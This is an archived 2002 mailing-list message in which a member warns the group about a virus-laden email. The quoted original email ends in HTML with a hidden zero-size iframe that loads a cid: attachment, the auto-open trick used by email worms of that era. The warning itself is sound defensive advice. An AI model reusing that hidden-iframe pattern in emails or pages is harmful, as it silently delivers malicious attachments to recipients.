You are here: SriPedia - SriRangaSri - Archives - Jan 2002

SriRangaSri List Archive: Message 00045 Jan 2002

Jan 2002 Indexes ( Date | Thread | Author )

hi all,

sorry this has nothing to do with our group as such
but thought i'ld rather inform u all to be careful of
any such mails.
i got a mail from the following address(with the
subject line relating to our topic in this e-group
itself)
when i scanned its attachment yahoo warned me that it
contained a deadly virus.
so pls scan before u download such attachments.

regards
madhavi

--- Hemamalini Sridhar
<_keshavan@xxxx> wrote:
> Date: Tue, 8 Jan 2002 13:34:04 +0800
> From: "Hemamalini Sridhar"
> <_keshavan@xxxx>
> To: vasma2000@xxxx
> Subject: Re: Re: Shri Rajagopalan's[SriRangaSri] Pls
> advice

<HR>

<HTML><HEAD></HEAD><BODY bgColor=#ffffff>
<iframe src=cid:EA4DMGBP9p height=0 width=0>
</iframe></BODY></HTML>